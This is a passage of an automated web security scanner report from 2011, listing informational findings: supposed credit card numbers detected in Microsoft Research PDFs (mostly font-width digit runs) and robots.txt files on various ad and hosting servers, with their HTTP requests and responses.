2 722 667 333 278 333 581 500 333 500 556 444 556 444 333 500 556 278 333 556 278 833 556 500 556 556 444 389 333 556 500 722 500 500]
endobj
287 0 obj
[556 556 167 333 611 278 333 333 0 333 564 0 611 444 333 278 0 0 0 0 0 0 0 0 0 0 0 0 333 180 250 333 408 500 500 833 778 333 333 333 500 564 250 333 250 278 500 500 500 500 500 500 500 500 500 500 278 278 564 564 564 444 921 722 667 667 722 611 556 722 722 333 389 722 611 88
...[SNIP]...

23.9. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/plas07.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/livshits/papers/ppt/plas07.pdf

Issue detail

The following credit card numbers were disclosed in the response:

4932501239750
5375385370355399
5505505500550550
5505505505500550

Request

GET /en-us/um/people/livshits/papers/ppt/plas07.pdf HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/pdf
Last-Modified: Mon, 18 Jun 2007 02:39:28 GMT
Accept-Ranges: bytes
ETag: "70a4de451b1c71:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:24 GMT
Connection: close
Content-Length: 3191210

%PDF-1.5
%....
1 0 obj
<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 1053 0 R/MarkInfo<</Marked true>>>>
endobj
2 0 obj
<</Type/Pages/Count 23/Kids[ 3 0 R 17 0 R 35 0 R 80 0 R 87 0 R 9
...[SNIP]...
</Type/FontDescriptor/FontName/ABCDEE+Calibri,Bold/Flags 32/ItalicAngle 0/Ascent 750/Descent -250/CapHeight 750/AvgWidth 518/MaxWidth 1732/FontWeight 700/XHeight 250/StemV 51/FontBBox[ -493 -250 1239 750] /FontFile2 1662 0 R>
...[SNIP]...
j
[ 226 0 0 0 0 0 0 0 0 0 0 0 0 306 0 0 0 507 507 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 561 0 0 488 459 0 0 0 0 0 423 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 494 537 418 537 503 316 474 537 246 255 0 246 813 537 538 537 0 355 399 347 537 473 745 459 474 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
...[SNIP]...

endobj
1688 0 obj
[ 550 0 0 0 0 0 0 0 0 0 0 0 0 0 550 550 0 0 0 0 0 0 0 0 0 0 0 0 550 0 550 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 550 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 550 550 0 0 550 550 0 0 550 550 550 550 550 0 550 550 550 550 550 550]
endobj
1689 0 obj
<</Filter/FlateDecode/Length 16018/Length1 30440>
...[SNIP]...
0 obj
[ 550 0 550 550 0 0 0 0 0 0 0 0 0 0 0 550 550 550 550 0 0 0 0 0 550 0 0 0 550 550 550 0 0 0 550 550 0 0 0 0 0 0 0 0 0 550 0 0 550 0 0 550 550 0 0 0 0 0 0 0 0 0 0 0 0 550 550 550 550 550 550 550 550 550 550 0 550 550 550 550 550 0 550 550 550 0 550 0 0 550 550]
endobj
1697 0 obj
<</Filter/FlateDecode/Length 20834/Length1 38016>
...[SNIP]...

23.10. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/usenixtech08.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/livshits/papers/ppt/usenixtech08.pdf

Issue detail

The following credit card number was disclosed in the response:

4932501239750

Request

GET /en-us/um/people/livshits/papers/ppt/usenixtech08.pdf HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/pdf
Last-Modified: Mon, 07 Jul 2008 17:25:42 GMT
Accept-Ranges: bytes
ETag: "21ce8a7b56e0c81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:22 GMT
Connection: close
Content-Length: 2444049

%PDF-1.5
%....
1 0 obj
<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 614 0 R/MarkInfo<</Marked true>>>>
endobj
2 0 obj
<</Type/Pages/Count 20/Kids[ 3 0 R 19 0 R 46 0 R 57 0 R 63 0 R 21
...[SNIP]...
</Type/FontDescriptor/FontName/ABCDEE+Calibri,Bold/Flags 32/ItalicAngle 0/Ascent 750/Descent -250/CapHeight 750/AvgWidth 518/MaxWidth 1732/FontWeight 700/XHeight 250/StemV 51/FontBBox[ -493 -250 1239 750] /FontFile2 1249 0 R>
...[SNIP]...
</Type/FontDescriptor/FontName/ABCDEE+Calibri,Bold/Flags 32/ItalicAngle 0/Ascent 750/Descent -250/CapHeight 750/AvgWidth 518/MaxWidth 1732/FontWeight 700/XHeight 250/StemV 51/FontBBox[ -493 -250 1239 750] /FontFile2 1269 0 R>
...[SNIP]...

23.11. http://research.microsoft.com/en-us/um/people/livshits/papers/tr/scriptgard_tr.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/livshits/papers/tr/scriptgard_tr.pdf

Issue detail

The following credit card number was disclosed in the response:

4443332780000000

Request

GET /en-us/um/people/livshits/papers/tr/scriptgard_tr.pdf HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/pdf
Last-Modified: Thu, 21 Oct 2010 20:42:59 GMT
Accept-Ranges: bytes
ETag: "80b38c6071cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:30 GMT
Connection: close
Content-Length: 1127515

%PDF-1.4
%....
3 0 obj <<
/Length 4847
/Filter /FlateDecode
>>
stream
x..[Y..F.~...7W......o....a.
V..@..,..E.E.I..._...E..bK..}X@...<.G._D........../.~..._.f.. .r.f7..7.o.,.oR...4.y(o.......=#
...[SNIP]...
6 556 389 278 389 422 500 333 500 500 444 500 444 278 500 500 278 278 444 278 722 500 500 500 500 389 389 278 500 444 667 444 444 389]
endobj
206 0 obj
[556 556 167 333 667 278 333 333 0 333 570 0 667 444 333 278 0 0 0 0 0 0 0 0 0 0 0 0 333 278 250 333 555 500 500 1000 833 333 333 333 500 570 250 333 250 278 500 500 500 500 500 500 500 500 500 500 333 333 570 570 570 500 930 722 667 722 722 667 611 778 778 389 500 778 667 9
...[SNIP]...

23.12. http://research.microsoft.com/en-us/um/people/nswamy/papers/beep-www07.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/nswamy/papers/beep-www07.pdf

Issue detail

The following credit card numbers were disclosed in the response:

5250525525525525
5255250525525525
5255255255250525
5255255255255250

Request

GET /en-us/um/people/nswamy/papers/beep-www07.pdf HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/pdf
Last-Modified: Sat, 18 Oct 2008 00:10:36 GMT
Accept-Ranges: bytes
ETag: "7a5fe3f1b530c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:33 GMT
Connection: close
Content-Length: 244451

%PDF-1.3%....
90 0 obj<< /Linearized 1 /O 92 /H [ 1505 640 ] /L 224994 /E 100084 /N 10 /T 223076 >> endobj xref90 54 0000000016 0000
...[SNIP]...
/y 122 /.notdef ] >> endobj76 0 obj[ 525 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 525 525 525 525 525 0 0 0 525 0 0 525 525 525 525 525 525 0 525 525 525 0 0 0 525 ]endobj77 0 obj<< /Type /Encoding /Differences [ 0 /.notdef 34 /quotedbl 35 /.notdef 39 /quoteright /parenleft /parenright 42 /.notdef 43 /plus /comma 45 /.notdef 46 /period /slash /z
...[SNIP]...
score /quoteleft /a /b /c /d /e /f /g /h /i /j /k /l /m /n /o /p /q /r /s /t /u /v /w /x /y /z /braceleft 124 /.notdef 125 /braceright 126 /.notdef ] >> endobj82 0 obj[ 525 525 525 0 0 525 525 525 525 0 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 0 525 0 525 525 0 525 525 525 525 525 525 525 525 525 0 525 0 525 525 525 525 525 525 525 525 0 525 0 525 0 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 525 0 525 ]endobj83 0 obj<< /Type /Pages /Count 6 /Parent 85 0 R /Kids [ 92 0 R 1 0 R 25 0 R 28 0 R 31 0 R 34 0 R ] >
...[SNIP]...

23.13. http://research.microsoft.com/en-us/um/people/nswamy/papers/rs.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/nswamy/papers/rs.pdf

Issue detail

The following credit card number was disclosed in the response:

6500500500500500

Request

GET /en-us/um/people/nswamy/papers/rs.pdf HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/pdf
Last-Modified: Sat, 18 Oct 2008 00:10:04 GMT
Accept-Ranges: bytes
ETag: "878124dfb530c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:34 GMT
Connection: close
Content-Length: 93646

%PDF-1.4
%....
3 0 obj <<
/Length 4198
/Filter /FlateDecode
>>
stream
x....r......-T...........S..&....Dbf.qH.$W+}......9H.4.@..o..O_}.!.n.,L."....I.2......0J..O..C.O=je..4...........I..i.L...~
...[SNIP]...
511.1 460 460 511.1 460 306.7 460 511.1 306.7 306.7 460 255.6 817.8 562.2 511.1 511.1 460 421.7 408.9 332.2 536.7 460 664.4 463.9 485.6 408.9]
endobj
34 0 obj
[583.3 555.6 555.6 833.3 833.3 277.8 305.6 500 500 500 500 500 750 444.4 500 722.2 777.8 500 902.8 1013.9 777.8 277.8 277.8 500 833.3 500 833.3 777.8 277.8 388.9 388.9 500 777.8 277.8 333.3 277.8 500 500 500 500 500 500 500 500 500 500 500 277.8 277.8 277.8 777.8
...[SNIP]...

23.14. http://research.microsoft.com/en-us/um/people/shuochen/papers/ScriptAccenting.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/shuochen/papers/ScriptAccenting.pdf

Issue detail

The following credit card number was disclosed in the response:

4440000000000000

Request

GET /en-us/um/people/shuochen/papers/ScriptAccenting.pdf HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/pdf
Last-Modified: Wed, 22 Aug 2007 17:18:03 GMT
Accept-Ranges: bytes
ETag: "6321e765e0e4c71:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:17 GMT
Connection: close
Content-Length: 402682

%PDF-1.3%....
56 0 obj <</Linearized 1/L 402682/O 58/E 176709/N 10/T 401515/H [ 876 463]>>endobj
xref
56 29
0000000016 00000 n
0000001339 00000 n
0000001419 00000 n
0000001611
...[SNIP]...
11 556 722 722 333 389 722 611 889 722 722 556 0 667 556 611 722 722 944 722 722 0 333 0 333 0 500 0 444 500 444 500 444 333 500 500 278 278 500 278 778 500 500 500 500 333 389 278 500 500 722 500 500 444 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 333 444 444 0 500]/BaseFont/INGCFO+TimesNewRomanPSMT/FirstChar 32/Encoding/WinAnsiEncoding/Type/Font>
...[SNIP]...

23.15. http://research.microsoft.com/en-us/um/people/xiaohe/publication/IEEE_MMSP06_p226.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/xiaohe/publication/IEEE_MMSP06_p226.pdf

Issue detail

The following credit card numbers were disclosed in the response:

3500350333500500
5563331000350667

Request

GET /en-us/um/people/xiaohe/publication/IEEE_MMSP06_p226.pdf HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/pdf
Last-Modified: Thu, 29 Jun 2006 20:00:07 GMT
Accept-Ranges: bytes
ETag: "70888a9eb69bc61:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:33 GMT
Connection: close
Content-Length: 120086

%PDF-1.4%....
60 0 obj <</Linearized 1/L 120086/O 63/E 16002/N 6/T 118839/H [ 776 371]>>endobj
xref
60 24
0000000016 00000 n
0000001147 00000 n
0000000776 00000 n
0000001237
...[SNIP]...
944 722 778 611 778 722 556 667 722 722 1000 722 722 667 333 278 333 581 500 333 500 556 444 556 444 333 500 556 278 333 556 278 833 556 500 556 556 444 389 333 556 500 722 500 500 444 394 220 394 520 350 0 350 333 500 500 1000 500 500 333 1000 556 333 1000 350 667 350 350 333 333 500 500 350 500 1000]>
...[SNIP]...

23.16. http://research.microsoft.com/en-us/um/people/zhang/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/zhang/

Issue detail

The following credit card number was disclosed in the response:

4401007010092510

Request

GET /en-us/um/people/zhang/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:25:11 GMT
Connection: close
Content-Length: 44812

<html>
<head>
   <title>Zhengyou Zhang's Home Page</title>
   <meta name="author" content="Zhengyou Zhang">
   <meta name="keywords" content="Zhengyou Zhang, Computer vision, Image-based modeling, Face
...[SNIP]...
<a href="http://www.springer.com/west/home/computer/computer+journals?SGWID=4-40100-70-1009251-0" onClick="stc(this, 24)">
...[SNIP]...

23.17. http://research.microsoft.com/en-us/um/redmond/events/aplwaca2010/s0pknu7ytck3k3lq9nas/p45-krithinakis.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/redmond/events/aplwaca2010/s0pknu7ytck3k3lq9nas/p45-krithinakis.pdf

Issue detail

The following credit card numbers were disclosed in the response:

5250525525525525
5255250525525525
5255255250525525
5255255255250525

Request

GET /en-us/um/redmond/events/aplwaca2010/s0pknu7ytck3k3lq9nas/p45-krithinakis.pdf HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/pdf
Last-Modified: Thu, 20 May 2010 19:26:12 GMT
Accept-Ranges: bytes
ETag: "022694e52f8ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:14 GMT
Connection: close
Content-Length: 92380

%PDF-1.4
%....
1 0 obj
<</LastChar 57/BaseFont/Times-Roman/Type/Font/Encoding<</Type/Encoding/Differences[52/four/five/six/seven/eight/nine]>>/Subtype/Type1/Widths[500 500 500 500 500 500]/FirstChar 5
...[SNIP]...
type/Type1/Encoding/WinAnsiEncoding/Widths[525 0 525 525 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 525 525 0 525 0 0 525 0 525 525 525 0 525 525 0 0 0 525 0 525 0 525 0 525 0 525 0 0 0 0 0 0 0 0 0 0 0 0 525 0 525 525 525 0 525 525 525 0 525 525 525 525 525 525 0 525 525 525 0 525 0 525]/FirstChar 38/FontDescriptor 46 0 R>
...[SNIP]...
</LastChar 122/BaseFont/GXFBOW+CMTT9/Type/Font/Subtype/Type1/Encoding/WinAnsiEncoding/Widths[525 525 525 525 0 525 0 0 0 525 0 525 525 525 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 525 525 525 525 525 0 525 525 525 525 525 525 525 525 525 525 0 525 525 525 525 0 525 0 525 525]/FirstChar 45/FontDescriptor 64 0 R>
...[SNIP]...

23.18. http://www.meetup.com/Boston-BizSpark-Meetup/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.meetup.com
Path:	/Boston-BizSpark-Meetup/

Issue detail

The following credit card number was disclosed in the response:

375309602028658

Request

Response

24. Robots.txt file previous next
There are 40 instances of this issue:

http://825-wpk-761.mktoresp.com/webevents/visitWebPage
http://ads.bluelithium.com/pixel
http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js
http://apnxscm.ac3.msn.com:81/CACMSH.ashx
http://c.mouseflow.com/a.gif
http://c7.zedo.com/img/bh.gif
https://cart.godaddy.com/basket.aspx
http://cspix.media6degrees.com/orbserv/hbpix
http://d3.zedo.com/jsc/d3/bh.html
http://d7.zedo.com/img/bh.gif
http://dclk-match.dotomi.com/
http://fonts.googleapis.com/css
https://idp.godaddy.com/login.aspx
http://imagesak.securepaynet.net/assets/godaddy.ico
http://img.godaddy.com/image.aspx
http://img1.wsimg.com/assets/godaddy.ico
http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js
http://login.dotomi.com/ucm/UCMController
https://mya.godaddy.com/products/accountlist.aspx
http://pagead2.googlesyndication.com/pagead/imgad
http://pixel.adblade.com/imps.php
http://registercom.tt.omtrdc.net/m2/registercom/mbox/standard
http://rss2search.com/delivery/ti.php
http://s.gravatar.com/js/gprofiles.js
http://segment-pixel.invitemedia.com/set_partner_uid
http://themes.googleusercontent.com/static/fonts/droidsans/v1/EFpQQyG9GqCrobXxL-KRMQFhaRv2pGgT5Kf0An0s4MM.woff
http://value.register.com/b/ss/registerwww-production/1/H.20.3/s74702994271647
http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html
https://www.cheapssls.com/index.php
http://www.digicert.com/
http://www.godaddy.com/SSL
https://www.godaddy.com/gdshop/xt_orderform_addmany.asp
http://www.googleadservices.com/pagead/conversion/1051291126/
http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/
http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760
https://www.microcad.ca/checkout/address
http://www.shrinktheweb.com/scripts/pagepix.js
https://www.sslmatrix.com/ssl-promotion-code
http://www.wunderground.com/dotset.php
http://www.youtube-nocookie.com/gen_204

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

24.1. http://825-wpk-761.mktoresp.com/webevents/visitWebPage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://825-wpk-761.mktoresp.com
Path:	/webevents/visitWebPage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 825-wpk-761.mktoresp.com

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:31:16 GMT
Server: Apache
Last-Modified: Fri, 08 Jul 2011 02:03:21 GMT
ETag: "1760c3c-18-4a7853ce56c40"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

24.2. http://ads.bluelithium.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.bluelithium.com

Response

HTTP/1.0 200 OK
Date: Sat, 03 Sep 2011 21:29:00 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 03 Sep 2011 21:29:00 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

24.3. http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ajax.googleapis.com
Path:	/ajax/libs/jquery/1.6/jquery.min.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Last-Modified: Mon, 23 Aug 2010 20:43:16 GMT
Date: Sat, 03 Sep 2011 21:33:50 GMT
Expires: Sat, 03 Sep 2011 20:28:36 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=0
Age: 0

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

24.4. http://apnxscm.ac3.msn.com:81/CACMSH.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apnxscm.ac3.msn.com:81
Path:	/CACMSH.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: apnxscm.ac3.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/plain
Expires: Sun, 04 Sep 2011 20:24:42 GMT
Last-Modified: Sat, 02 Apr 2011 00:47:24 GMT
Accept-Ranges: bytes
ETag: "1CBF0CF87F3F600"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 03 Sep 2011 21:38:24 GMT
Connection: close
Content-Length: 70

# Keep all robots out of entire web site
User-agent: *
Disallow: /

24.5. http://c.mouseflow.com/a.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.mouseflow.com
Path:	/a.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.mouseflow.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 20 Apr 2011 14:02:33 GMT
Accept-Ranges: bytes
ETag: "5eb4af9863ffcb1:0"
Server: Microsoft-IIS/7.5
Date: Sat, 03 Sep 2011 21:34:46 GMT
Connection: close
Content-Length: 27

User-agent: *
Allow: /

24.6. http://c7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/img/bh.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Tue, 31 May 2005 07:08:00 GMT
ETag: "296db4-4c-3f861aa21f400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Sat, 03 Sep 2011 21:40:30 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

24.7. https://cart.godaddy.com/basket.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cart.godaddy.com
Path:	/basket.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cart.godaddy.com

Response

HTTP/1.1 200 OK
Content-Length: 522
Content-Type: text/plain
Last-Modified: Mon, 09 Nov 2009 22:05:47 GMT
Accept-Ranges: bytes
ETag: "ccd2b2ca8861ca1:57f"
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:48:30 GMT
Connection: close

...User-agent: *
Disallow: /Errors/
Disallow: /Actions/
Disallow: /Shared/Content/
Disallow: /BasketControls/
Disallow: /Monitor/
Disallow: /PromoControls/
Disallow: /Scripts/
Disallow: /Servi
...[SNIP]...

24.8. http://cspix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cspix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"36-1268078506000"
Last-Modified: Mon, 08 Mar 2010 20:01:46 GMT
Content-Type: text/plain
Content-Length: 36
Date: Sat, 03 Sep 2011 17:32:22 GMT
Connection: close

# go away
User-agent: *
Disallow: /

24.9. http://d3.zedo.com/jsc/d3/bh.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d3.zedo.com
Path:	/jsc/d3/bh.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Sat, 03 Sep 2011 21:40:24 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

24.10. http://d7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/img/bh.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Sat, 03 Sep 2011 21:40:25 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

24.11. http://dclk-match.dotomi.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dclk-match.dotomi.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dclk-match.dotomi.com

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:57:00 GMT
Server: Apache
X-Name: rtb-s08
Last-Modified: Fri, 11 Sep 2009 22:34:40 GMT
ETag: "4fb8035-a2-47354ebf52000"
Accept-Ranges: bytes
Content-Length: 162
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID TAIi OUR IND OTC"
Connection: close
Content-Type: text/plain

#do not edit this file in ms-platform, you need unix line seperators for it.
#this file will disallow any robots to search the dmc.
User-Agent: *
Disallow: /

24.12. http://fonts.googleapis.com/css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fonts.googleapis.com
Path:	/css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fonts.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 03 Sep 2011 21:32:47 GMT
Expires: Sat, 03 Sep 2011 21:32:47 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

24.13. https://idp.godaddy.com/login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/login.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: idp.godaddy.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 14 Apr 2009 23:01:01 GMT
Accept-Ranges: bytes
ETag: "598ea5e154bdc91:13a9"
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
